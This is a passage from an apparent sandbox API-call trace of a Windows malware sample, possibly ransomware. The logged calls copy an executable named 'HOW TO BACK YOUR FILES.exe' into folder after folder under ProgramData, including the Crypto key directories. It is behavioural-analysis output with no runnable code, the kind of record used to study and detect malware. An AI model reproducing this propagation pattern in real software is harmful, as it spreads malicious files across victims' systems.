FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\crypto\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.670] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.670] GetLastError () returned 0x0 [0090.670] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.670] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.671] CloseHandle (hObject=0x120) returned 1 [0090.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.671] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.671] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c84ada0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c84ada0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.671] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA" [0090.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3351a8 | out: hHeap=0x2b0000) returned 1 [0090.671] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0090.671] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA") returned 73 [0090.671] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA" [0090.671] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.671] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\crypto\\rsa\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.672] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.672] GetLastError () returned 0x0 [0090.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.672] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.672] CloseHandle (hObject=0x120) returned 1 [0090.672] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.672] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.672] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.672] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18" [0090.672] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0090.672] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0090.672] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned 82 [0090.672] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18" [0090.672] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.672] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\crypto\\rsa\\s-1-5-18\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.673] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.673] GetLastError () returned 0x0 [0090.673] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.673] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.673] CloseHandle (hObject=0x120) returned 1 [0090.673] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.673] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.673] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfc65d150, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x66f412c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x66f412c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.674] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys" [0090.674] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.674] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0090.674] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 85 [0090.674] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys" [0090.674] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.674] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\crypto\\rsa\\machinekeys\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.674] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.675] GetLastError () returned 0x0 [0090.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.675] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.675] CloseHandle (hObject=0x120) returned 1 [0090.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.675] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.675] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.675] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\Keys", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\Keys") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\Keys" [0090.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335108 | out: hHeap=0x2b0000) returned 1 [0090.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0090.675] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\Keys") returned 74 [0090.675] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\Keys" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\Keys") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\Keys" [0090.675] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.675] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\Keys\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\crypto\\keys\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.676] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.676] GetLastError () returned 0x0 [0090.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.676] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.676] CloseHandle (hObject=0x120) returned 1 [0090.676] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.676] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.676] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.676] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS" [0090.676] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0090.677] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0090.677] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS") returned 73 [0090.677] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS" [0090.677] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.677] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\crypto\\dss\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.677] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.678] GetLastError () returned 0x0 [0090.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.678] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.678] CloseHandle (hObject=0x120) returned 1 [0090.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.678] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.678] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c897060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c897060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.678] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys" [0090.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0090.678] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys") returned 85 [0090.678] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys" [0090.678] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.678] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\crypto\\dss\\machinekeys\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.679] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.679] GetLastError () returned 0x0 [0090.679] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.679] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.679] CloseHandle (hObject=0x120) returned 1 [0090.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.679] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.679] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.679] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance" [0090.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0090.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0090.679] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance") returned 73 [0090.680] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance" [0090.680] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.680] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\assistance\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.680] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.680] GetLastError () returned 0x0 [0090.680] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.680] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.680] CloseHandle (hObject=0x120) returned 1 [0090.680] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.681] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.681] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.681] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client" [0090.681] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0090.681] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0090.681] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client") returned 80 [0090.681] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client" [0090.681] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.681] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\assistance\\client\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.681] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.682] GetLastError () returned 0x0 [0090.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.682] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.682] CloseHandle (hObject=0x120) returned 1 [0090.682] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.682] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.682] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Assistance\\Client\\*", 